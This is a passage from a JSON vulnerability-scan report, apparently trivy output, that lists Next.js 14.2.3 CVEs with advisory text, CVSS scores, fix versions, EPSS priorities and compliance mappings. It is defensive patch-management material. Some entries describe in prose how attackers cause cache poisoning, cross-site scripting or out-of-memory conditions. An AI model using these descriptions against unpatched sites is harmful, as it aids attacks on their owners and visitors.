} ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 13.341866666666666, "epss": 0.00016, "epss_percentile": 0.03853, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 4, "epss_multiplier": 1.00064, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "4721ee25bf757892", "ruleId": "CVE-2026-44577", "severity": "MEDIUM", "tool": { "name": "trivy", "version": "unknown" }, "location": { "path": "package-lock.json", "startLine": 0 }, "message": "Next.js has a Denial of Service in the Image Optimization API", "title": "CVE-2026-44577", "description": "Next.js is a React framework for building full-stack web applications. From 10.0.0 to before 15.5.16 and 16.2.5, when self-hosting Next.js with the default image loader, the Image Optimization API fetches local images entirely into memory without enforcing a maximum size limit. An attacker could cause out-of-memory conditions by requesting large local assets from the /_next/image endpoint that match the images.localPatterns configuration (by default, all patterns are allowed). This vulnerability is fixed in 15.5.16 and 16.2.5.", "remediation": "https://avd.aquasec.com/nvd/cve-2026-44577", "references": [], "tags": [ "vulnerability", "pkg:next@14.2.3" ], "risk": { "cwe": [ "CWE-770" ] }, "raw": { "VulnerabilityID": "CVE-2026-44577", "VendorIDs": [ "GHSA-h64f-5h5j-jqjh" ], "PkgID": "next@14.2.3", "PkgName": "next", "PkgIdentifier": { "PURL": "pkg:npm/next@14.2.3", "UID": "494c23d2c970c8b" }, "InstalledVersion": "14.2.3", "FixedVersion": "15.5.16, 16.2.5", "Status": "fixed", "SeveritySource": "ghsa", "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-44577", "DataSource": { "ID": "ghsa", "Name": "GitHub Security Advisory npm", "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" }, "Fingerprint": "sha256:9f08da120547fe06a6ff340ef05ca8e057af610a1e77041d7d119d2cea50fca0", "Title": "Next.js has a Denial of Service in the Image Optimization API", "Description": "Next.js is a React framework for building full-stack web applications. From 10.0.0 to before 15.5.16 and 16.2.5, when self-hosting Next.js with the default image loader, the Image Optimization API fetches local images entirely into memory without enforcing a maximum size limit. An attacker could cause out-of-memory conditions by requesting large local assets from the /_next/image endpoint that match the images.localPatterns configuration (by default, all patterns are allowed). This vulnerability is fixed in 15.5.16 and 16.2.5.", "Severity": "MEDIUM", "CweIDs": [ "CWE-770" ], "VendorSeverity": { "ghsa": 2 }, "CVSS": { "ghsa": { "V3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H", "V3Score": 5.9 } }, "References": [ "https://github.com/vercel/next.js", "https://github.com/vercel/next.js/releases/tag/v15.5.16", "https://github.com/vercel/next.js/releases/tag/v16.2.5", "https://github.com/vercel/next.js/security/advisories/GHSA-h64f-5h5j-jqjh", "https://nvd.nist.gov/vuln/detail/CVE-2026-44577" ], "PublishedDate": "2026-05-13T17:16:23.173Z", "LastModifiedDate": "2026-05-13T20:00:59.993Z" }, "context": { "sbom": { "name": "next", "version": "14.2.3", "path": "/package-lock.json" } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 13.342933333333333, "epss": 0.00018, "epss_percentile": 0.0459, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 4, "epss_multiplier": 1.00072, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "550fe8bea52b0c14", "ruleId": "CVE-2026-44580", "severity": "MEDIUM", "tool": { "name": "trivy", "version": "unknown" }, "location": { "path": "package-lock.json", "startLine": 0 }, "message": "Next.js has cross-site scripting in beforeInteractive scripts with untrusted input", "title": "CVE-2026-44580", "description": "Next.js is a React framework for building full-stack web applications. From 13.0.0 to before 15.5.16 and 16.2.5, applications that use beforeInteractive scripts together with untrusted content can be vulnerable to cross-site scripting. In affected versions, serialized script content was not escaped safely before being embedded into the document, which could allow attacker-controlled input to break out of the intended script context and execute arbitrary JavaScript in a visitor's browser. This vulnerability is fixed in 15.5.16 and 16.2.5.", "remediation": "https://avd.aquasec.com/nvd/cve-2026-44580", "references": [], "tags": [ "vulnerability", "pkg:next@14.2.3" ], "risk": { "cwe": [ "CWE-79" ] }, "raw": { "VulnerabilityID": "CVE-2026-44580", "VendorIDs": [ "GHSA-gx5p-jg67-6x7h" ], "PkgID": "next@14.2.3", "PkgName": "next", "PkgIdentifier": { "PURL": "pkg:npm/next@14.2.3", "UID": "494c23d2c970c8b" }, "InstalledVersion": "14.2.3", "FixedVersion": "15.5.16, 16.2.5", "Status": "fixed", "SeveritySource": "ghsa", "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-44580", "DataSource": { "ID": "ghsa", "Name": "GitHub Security Advisory npm", "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" }, "Fingerprint": "sha256:271ac03a6853a4a85c0ed6629628a269cc75c889ec605033b36b7d5a63fe43fb", "Title": "Next.js has cross-site scripting in beforeInteractive scripts with untrusted input", "Description": "Next.js is a React framework for building full-stack web applications. From 13.0.0 to before 15.5.16 and 16.2.5, applications that use beforeInteractive scripts together with untrusted content can be vulnerable to cross-site scripting. In affected versions, serialized script content was not escaped safely before being embedded into the document, which could allow attacker-controlled input to break out of the intended script context and execute arbitrary JavaScript in a visitor's browser. This vulnerability is fixed in 15.5.16 and 16.2.5.", "Severity": "MEDIUM", "CweIDs": [ "CWE-79" ], "VendorSeverity": { "ghsa": 2 }, "CVSS": { "ghsa": { "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "V3Score": 6.1 } }, "References": [ "https://github.com/vercel/next.js", "https://github.com/vercel/next.js/releases/tag/v15.5.16", "https://github.com/vercel/next.js/releases/tag/v16.2.5", "https://github.com/vercel/next.js/security/advisories/GHSA-gx5p-jg67-6x7h", "https://nvd.nist.gov/vuln/detail/CVE-2026-44580" ], "PublishedDate": "2026-05-13T18:16:18.26Z", "LastModifiedDate": "2026-05-14T18:33:34.17Z" }, "context": { "sbom": { "name": "next", "version": "14.2.3", "path": "/package-lock.json" } }, "compliance": { "owaspTop10_2021": [ "A03:2021" ], "cweTop25_2024": [ { "id": "CWE-79", "rank": 1, "category": "Injection" } ], "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "DETECT", "category": "DE.CM", "subcategory": "DE.CM-8", "description": "Vulnerability scans are performed" }, { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.2.4", "description": "Prevent XSS attacks in bespoke software", "priority": "CRITICAL" }, { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1190", "techniqueName": "Exploit Public-Facing Application", "subtechnique": "", "subtechniqueName": "" }, { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 13.339733333333335, "epss": 0.00012, "epss_percentile": 0.01845, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 4, "epss_multiplier": 1.00048, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "ffcab1bb08bb5e14", "ruleId": "CVE-2026-44581", "severity": "MEDIUM", "tool": { "name": "trivy", "version": "unknown" }, "location": { "path": "package-lock.json", "startLine": 0 }, "message": "Next.js vulnerable to cross-site scripting in App Router applications using CSP nonces", "title": "CVE-2026-44581", "description": "Next.js is a React framework for building full-stack web applications. From 13.4.0 to before 15.5.16 and 16.2.5, App Router applications that rely on CSP nonces can be vulnerable to stored cross-site scripting when deployed behind shared caches. In affected versions, malformed nonce values derived from request headers could be reflected into rendered HTML in an unsafe way, allowing an attacker to poison cached responses and cause script execution for later visitors. This vulnerability is fixed in 15.5.16 and 16.2.5.", "remediation": "https://avd.aquasec.com/nvd/cve-2026-44581", "references": [], "tags": [ "vulnerability", "pkg:next@14.2.3" ], "risk": { "cwe": [ "CWE-79" ] }, "raw": { "VulnerabilityID": "CVE-2026-44581", "VendorIDs": [ "GHSA-ffhc-5mcf-pf4q" ], "PkgID": "next@14.2.3", "PkgName": "next", "PkgIdentifier": { "PURL": "pkg:npm/next@14.2.3", "UID": "494c23d2c970c8b" }, "InstalledVersion": "14.2.3", "FixedVersion": "15.5.16, 16.2.5", "Status": "fixed", "SeveritySource": "ghsa", "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-44581", "DataSource": { "ID": "ghsa", "Name": "GitHub Security Advisory npm", "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" }, "Fingerprint": "sha256:6f2ba23fa5d8ac9fe972f5c6d8249e305d739b420e200ac40e762626f914dc86", "Title": "Next.js vulnerable to cross-site scripting in App Router applications using CSP nonces", "Description": "Next.js is a React framework for building full-stack web applications. From 13.4.0 to before 15.5.16 and 16.2.5, App Router applications that rely on CSP nonces can be vulnerable to stored cross-site scripting when deployed behind shared caches. In affected versions, malformed nonce values derived from request headers could be reflected into rendered HTML in an unsafe way, allowing an attacker to poison cached responses and cause script execution for later visitors. This vulnerability is fixed in 15.5.16 and 16.2.5.", "Severity": "MEDIUM", "CweIDs": [ "CWE-79" ], "VendorSeverity": { "ghsa": 2 }, "CVSS": { "ghsa": { "V3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:L/I:L/A:N", "V3Score": 4.7 } }, "References": [ "https://github.com/vercel/next.js", "https://github.com/vercel/next.js/releases/tag/v15.5.16", "https://github.com/vercel/next.js/releases/tag/v16.2.5", "https://github.com/vercel/next.js/security/advisories/GHSA-ffhc-5mcf-pf4q", "https://nvd.nist.gov/vuln/detail/CVE-2026-44581" ], "PublishedDate": "2026-05-13T18:16:18.4Z", "LastModifiedDate": "2026-05-14T18:30:24.34Z" }, "context": { "sbom": { "name": "next", "version": "14.2.3", "path": "/package-lock.json" } }, "compliance": { "owaspTop10_2021": [ "A03:2021" ], "cweTop25_2024": [ { "id": "CWE-79", "rank": 1, "category": "Injection" } ], "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "DETECT", "category": "DE.CM", "subcategory": "DE.CM-8", "description": "Vulnerability scans are performed" }, { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.2.4", "description": "Prevent XSS attacks in bespoke software", "priority": "CRITICAL" }, { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1190", "techniqueName": "Exploit Public-Facing Application", "subtechnique": "", "subtechniqueName": "" }, { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 13.352000000000002, "epss": 0.00035, "epss_percentile": 0.10495, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 4, "epss_multiplier": 1.0014, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "f36c532127e73145", "ruleId": "CVE-2025-32421", "severity": "LOW", "tool": { "name": "trivy", "version": "unknown" }, "location": { "path": "package-lock.json", "startLine": 0 }, "message": "next.js: Next.js Race Condition to Cache Poisoning", "title": "CVE-2025-32421", "description": "Next.js is a React framework for building full-stack web applications. Versions prior to 14.2.24 and 15.1.6 have a race-condition vulnerability. This issue only affects the Pages Router under certain misconfigurations, causing normal endpoints to serve `pageProps` data instead of standard HTML. This issue was patched in versions 15.1.6 and 14.2.24 by stripping the `x-now-route-matches` header from incoming requests. Applications hosted on Vercel's platform are not affected by this issue, as the platform does not cache responses based solely on `200 OK` status without explicit `cache-control` headers. Those who self-host Next.js deployments and are unable to upgrade immediately can mitigate this vulnerability by stripping the `x-now-route-matches` header from all incoming requests at the content development network and setting `cache-control: no-store` for all responses under risk. The maintainers of Next.js strongly recommend only caching responses with explicit cache-control headers.", "remediation": "https://avd.aquasec.com/nvd/cve-2025-32421", "references": [], "tags": [ "vulnerability", "pkg:next@14.2.3" ], "risk": { "cwe": [ "CWE-362" ] }, "raw": { "VulnerabilityID": "CVE-2025-32421", "VendorIDs": [ "GHSA-qpjv-v59x-3qc4" ], "PkgID": "next@14.2.3", "PkgName": "next", "PkgIdentifier": { "PURL": "pkg:npm/next@14.2.3", "UID": "494c23d2c970c8b" }, "InstalledVersion": "14.2.3", "FixedVersion": "14.2.24, 15.1.6", "Status": "fixed", "SeveritySource": "ghsa", "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2025-32421", "DataSource": { "ID": "ghsa", "Name": "GitHub Security Advisory npm", "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" }, "Fingerprint": "sha256:64a9f428dd88df3e06576561410dff61f0fec0914799e7cfd4827204eba10d1b", "Title": "next.js: Next.js Race Condition to Cache Poisoning", "Description": "Next.js is a React framework for building full-stack web applications. Versions prior to 14.2.24 and 15.1.6 have a race-condition vulnerability. This issue only affects the Pages Router under certain misconfigurations, causing normal endpoints to serve `pageProps` data instead of standard HTML. This issue was patched in versions 15.1.6 and 14.2.24 by stripping the `x-now-route-matches` header from incoming requests. Applications hosted on Vercel's platform are not affected by this issue, as the platform does not cache responses based solely on `200 OK` status without explicit `cache-control` headers. Those who self-host Next.js deployments and are unable to upgrade immediately can mitigate this vulnerability by stripping the `x-now-route-matches` header from all incoming requests at the content development network and setting `cache-control: no-store` for all responses under risk. The maintainers of Next.js strongly recommend only caching responses with explicit cache-control headers.", "Severity": "LOW", "CweIDs": [ "CWE-362" ], "VendorSeverity": { "ghsa": 1, "redhat": 1 }, "CVSS": { "ghsa": { "V3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N", "V3Score": 3.7 }, "redhat": { "V3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N", "V3Score": 3.7 } }, "References": [ "https://access.redhat.com/security/cve/CVE-2025-32421", "https://github.com/vercel/next.js", "https://github.com/vercel/next.js/security/advisories/GHSA-qpjv-v59x-3qc4", "https://nvd.nist.gov/vuln/detail/CVE-2025-32421", "https://vercel.com/changelog/cve-2025-32421", "https://www.cve.org/CVERecord?id=CVE-2025-32421" ], "PublishedDate": "2025-05-14T23:15:47.87Z", "LastModifiedDate": "2025-09-10T15:16:10.053Z" }, "context": { "sbom": { "name": "next", "version": "14.2.3", "path": "/package-lock.json" } }, "compliance": { "cweTop25_2024": [ { "id": "CWE-362", "rank": 21, "category": "Race Condition" } ], "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 6.867200000000001, "epss": 0.00752, "epss_percentile": 0.73386, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 2, "epss_multiplier": 1.03008, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "1ce95f8bcd69d427", "ruleId": "CVE-2025-48068", "severity": "LOW", "tool": { "name": "trivy", "version": "unknown" }, "location": { "path": "package-lock.json", "startLine": 0 }, "message": "next.js: Information exposure in Next.js dev server due to lack of origin verification", "title": "CVE-2025-48068", "description": "Next.js is a React framework for building full-stack web applications. In versions starting from 13.0 to before 14.2.30 and 15.0.0 to before 15.2.2, Next.js may have allowed limited source code exposure when the dev server was running with the App Router enabled. The vulnerability only affects local development environments and requires the user to visit a malicious webpage while npm run dev is active. This issue has been patched in versions 14.2.30 and 15.2.2.", "remediation": "https://avd.aquasec.com/nvd/cve-2025-48068", "references": [], "tags": [ "vulnerability", "pkg:next@14.2.3" ], "risk": { "cwe": [ "CWE-1385" ] }, "raw": { "VulnerabilityID": "CVE-2025-48068", "VendorIDs": [ "GHSA-3h52-269p-cp9r" ], "PkgID": "next@14.2.3", "PkgName": "next", "PkgIdentifier": { "PURL": "pkg:npm/next@14.2.3", "UID": "494c23d2c970c8b" }, "InstalledVersion": "14.2.3", "FixedVersion": "15.2.2, 14.2.30", "Status": "fixed", "SeveritySource": "ghsa", "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2025-48068", "DataSource": { "ID": "ghsa", "Name": "GitHub Security Advisory npm", "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" }, "Fingerprint": "sha256:69e57f7a20f65a73ee7bd893aee36db195599076d8c92184edf8fe2c2707d9a6", "Title": "next.js: Information exposure in Next.js dev server due to lack of origin verification", "Description": "Next.js is a React framework for building full-stack web applications. In versions starting from 13.0 to before 14.2.30 and 15.0.0 to before 15.2.2, Next.js may have allowed limited source code exposure when the dev server was running with the App Router enabled. The vulnerability only affects local development environments and requires the user to visit a malicious webpage while npm run dev is active. This issue has been patched in versions 14.2.30 and 15.2.2.", "Severity": "LOW", "CweIDs": [ "CWE-1385" ], "VendorSeverity": { "ghsa": 1, "nvd": 2, "redhat": 2 }, "CVSS": { "ghsa": { "V40Vector": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:L/VI:N/VA:N/SC:L/SI:N/SA:N", "V40Score": 2.3 }, "nvd": { "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N", "V3Score": 4.3 }, "redhat": { "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N", "V3Score": 4.3 } }, "References": [ "https://access.redhat.com/security/cve/CVE-2025-48068", "https://github.com/vercel/next.js", "https://github.com/vercel/next.js/security/advisories/GHSA-3h52-269p-cp9r", "https://nvd.nist.gov/vuln/detail/CVE-2025-48068", "https://vercel.com/changelog/cve-2025-48068", "https://www.cve.org/CVERecord?id=CVE-2025-48068" ], "PublishedDate": "2025-05-30T04:15:48.51Z", "LastModifiedDate": "2025-09-10T15:17:38.677Z" }, "context": { "sbom": { "name": "next", "version": "14.2.3", "path": "/package-lock.json" } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 6.693600000000001, "epss": 0.00101, "epss_percentile": 0.2732, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 2, "epss_multiplier": 1.00404, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "e32b41f01db1c199", "ruleId": "CVE-2026-44572", "severity": "LOW", "tool": { "name": "trivy", "version": "unknown" }, "location": { "path": "package-lock.json", "startLine": 0 }, "message": "Next.js's Middleware / Proxy redirects can be cache-poisoned", "title": "CVE-2026-44572", "description": "Next.js is a React framework for building full-stack web applications. From 12.2.0 to before 15.5.16 and 16.2.5, an external client could send a x-nextjs-data header on a normal request to a path handled by middleware that returns a redirect. When that happened, the middleware/proxy could treat the request as a data request and replace the standard Location redirect header with the internal x-nextjs-redirect header. Browsers do not follow x-nextjs-redirect, so the response became an unusable redirect for normal clients. If the application was deployed behind a CDN or reverse proxy that caches 3xx responses without varying on this header, a single attacker request could poison the cached redirect response for the affected path. Subsequent visitors could then receive a cached redirect response without a Location header, causing a denial of service for that redirect path until the cache entry expired or was purged. This vulnerability is fixed in 15.5.16 and 16.2.5.", "remediation": "https://avd.aquasec.com/nvd/cve-2026-44572", "references": [], "tags": [ "vulnerability", "pkg:next@14.2.3" ], "risk": { "cwe": [ "CWE-349" ] }, "raw": { "VulnerabilityID": "CVE-2026-44572", "VendorIDs": [ "GHSA-3g8h-86w9-wvmq" ], "PkgID": "next@14.2.3", "PkgName": "next", "PkgIdentifier": { "PURL": "pkg:npm/next@14.2.3", "UID": "494c23d2c970c8b" }, "InstalledVersion": "14.2.3", "FixedVersion": "15.5.16, 16.2.5", "Status": "fixed", "SeveritySource": "ghsa", "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-44572", "DataSource": { "ID": "ghsa", "Name": "GitHub Security Advisory npm", "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" }, "Fingerprint": "sha256:7a874ea313c88fdfc018ce40fae507cbe374abff06d472b78d118b05b82c32ac", "Title": "Next.js's Middleware / Proxy redirects can be cache-poisoned", "Description": "Next.js is a React framework for building full-stack web applications. From 12.2.0 to before 15.5.16 and 16.2.5, an external client could send a x-nextjs-data header on a normal request to a path handled by middleware that returns a redirect. When that happened, the middleware/proxy could treat the request as a data request and replace the standard Location redirect header with the internal x-nextjs-redirect header. Browsers do not follow x-nextjs-redirect, so the response became an unusable redirect for normal clients. If the application was deployed behind a CDN or reverse proxy that caches 3xx responses without varying on this header, a single attacker request could poison the cached redirect response for the affected path. Subsequent visitors could then receive a cached redirect response without a Location header, causing a denial of service for that redirect path until the cache entry expired or was purged. This vulnerability is fixed in 15.5.16 and 16.2.5.", "Severity": "LOW", "CweIDs": [ "CWE-349" ], "VendorSeverity": { "ghsa": 1, "nvd": 2 }, "CVSS": { "ghsa": { "V3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L", "V3Score": 3.7 }, "nvd": { "V3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H", "V3Score": 5.9 } }, "References": [ "https://github.com/vercel/next.js", "https://github.com/vercel/next.js/releases/tag/v15.5.16", "https://github.com/vercel/next.js/releases/tag/v16.2.5", "https://github.com/vercel/next.js/security/advisories/GHSA-3g8h-86w9-wvmq", "https://nvd.nist.gov/vuln/detail/CVE-2026-44572" ], "PublishedDate": "2026-05-13T16:16:58.8Z", "LastModifiedDate": "2026-05-15T15:46:08.98Z" }, "context": { "sbom": { "name": "next", "version": "14.2.3", "path": "/package-lock.json" } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 6.6688, "epss": 8e-05, "epss_percentile": 0.00741, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 2, "epss_multiplier": 1.00032, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "f3c2cbad0f8c4f0a", "ruleId": "CVE-2026-44582", "severity": "LOW", "tool": { "name": "trivy", "version": "unknown" }, "location": { "path": "package-lock.json", "startLine": 0 }, "message": "Next.js vulnerable to cache poisoning via collisions in React Server Component cache-busting", "title": "CVE-2026-44582", "description": "Next.js is a React framework for building full-stack web applications. From 13.4.6 to before 15.5.16 and 16.2.5, React Server Component responses can be vulnerable to cache poisoning in deployments that rely on shared caches with insufficient response partitioning. In affected conditions, collisions in the _rsc cache-busting value can allow an attacker to poison cache entries so users receive the wrong response variant for a given URL. This vulnerability is fixed in 15.5.16 and 16.2.5.", "remediation": "https://avd.aquasec.com/nvd/cve-2026-44582", "references": [], "tags": [ "vulnerability", "pkg:next@14.2.3" ], "risk": { "cwe": [ "CWE-328" ] }, "raw": { "VulnerabilityID": "CVE-2026-44582", "VendorIDs": [ "GHSA-vfv6-92ff-j949" ], "PkgID": "next@14.2.3", "PkgName": "next", "PkgIdentifier": { "PURL": "pkg:npm/next@14.2.3", "UID": "494c23d2c970c8b" }, "InstalledVersion": "14.2.3", "FixedVersion": "15.5.16, 16.2.5", "Status": "fixed", "SeveritySource": "ghsa", "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-44582", "DataSource": { "ID": "ghsa", "Name": "GitHub Security Advisory npm", "URL": 